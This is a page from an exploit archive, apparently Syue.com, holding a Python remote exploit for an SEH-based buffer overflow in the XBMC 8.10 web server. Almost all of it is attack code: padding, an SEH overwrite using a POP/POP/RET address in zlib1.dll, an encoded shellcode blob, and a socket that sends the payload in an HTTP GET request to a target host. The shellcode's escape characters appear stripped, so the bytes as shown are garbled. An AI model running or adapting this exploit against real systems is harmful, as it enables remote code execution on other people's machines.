XBMC 8.10 GET Request Remote Buffer Overflow Exploit (SEH) (univ)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XBMC 8.10 GET Request Remote Buffer Overflow Exploit (SEH) (univ)
# Published : 2009-04-06
# Author : n00b
# Previous Title : peterConnects Web Server Traversal Arbitrary File Access Vulnerability
# Next Title : Pirelli Discus DRG A225 wifi router WPA2PSK Default Algorithm Exploit

#!/usr/bin/env python 

'''
Xbmc get request remote buffer overflow 8.10 *seh*(Universal address)!!  

Tested:Win xp sp2 eng Win vista sp1
Vendor url:http://xbmc.org/ 
Release date:April the 4th 2009

versions affected: windows all versions. 

I had tried awhile to get a nice pop ebx pop ret address and just   
could not find a suitable one especially that was any good.and it   
had to be shipped with the application and not have /safe seh.  
  
To start with i looked at the zlib.dll to see of there were any 
nice pop pop ret address i noticed there was one in particular that 
stood out and decided to try it. 
 
There is no need for me to release any more exploits for this application  
as i have covered all the areas which i wanted to and want to   
move on from this. 
 
If your interested to see how this worked attach a debugger and add some 
hit tracing :).It is possible to use this with all the buffer overflows 
i released. 

Credits to n00b for finding the buffer overflow and writing  
exploit.

----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''


import sys, socket 
import struct

port = 80 
host = sys.argv[1] 

#1635
Junk_buffer1 = 'A'*998
Pointer_To_Next_SEH = struct.pack('<L',0x909006eb)

###
###/SafeSEH Module Scanner, item 55
# SEH mode=/SafeSEH OFF
# Base=0x62e80000
# Limit=0x62e97000
# Module Name=C:Program FilesXBMCzlib1.dll

###
###This was found in the module zlib1 and is universal.
#62E83BAC   5B               POP EBX
#62E83BAD   5D               POP EBP
#62E83BAE  ^E9 CDD9FFFF      JMP zlib1.compressBound
SE_Handler = struct.pack('<L',0x62E83BAC)


Junk_buffer3 = 'D'*635
Shell_code=(#
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x50x42x50x42x30x4bx58x45x54x4ex33x4bx38x4ex57"
"x45x30x4ax37x41x30x4fx4ex4bx58x4fx44x4ax41x4bx38"
"x4fx35x42x42x41x30x4bx4ex49x34x4bx58x46x33x4bx58"
"x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x58x42x4c"
"x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x46x30x45x47x45x4ex4bx48"
"x4fx35x46x32x41x50x4bx4ex48x36x4bx58x4ex50x4bx54"
"x4bx58x4fx35x4ex31x41x50x4bx4ex4bx38x4ex41x4bx38"
"x41x30x4bx4ex49x38x4ex45x46x52x46x50x43x4cx41x53"
"x42x4cx46x46x4bx48x42x44x42x43x45x38x42x4cx4ax37"
"x4ex50x4bx48x42x44x4ex50x4bx48x42x57x4ex51x4dx4a"
"x4bx48x4ax46x4ax30x4bx4ex49x30x4bx58x42x58x42x4b"
"x42x30x42x50x42x30x4bx48x4ax46x4ex43x4fx55x41x43"
"x48x4fx42x56x48x55x49x58x4ax4fx43x38x42x4cx4bx57"
"x42x55x4ax46x4fx4ex50x4cx42x4ex42x46x4ax36x4ax49"
"x50x4fx4cx48x50x30x47x35x4fx4fx47x4ex43x46x41x56"
"x4ex46x43x56x50x42x45x56x4ax37x45x36x42x30x5a"
)

# create a socket object called 'c' 
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

# connect to the socket 
c.connect((host, port)) 

Request = (Junk_buffer1 + Pointer_To_Next_SEH + SE_Handler + Shell_code + Junk_buffer3)

# create a file-like object to read 
fileobj = c.makefile('r', 0) 

# Ask the server for the file 
fileobj.write("GET /"+Request+" HTTP/1.1nn") 

# www.Syue.com [2009-04-06]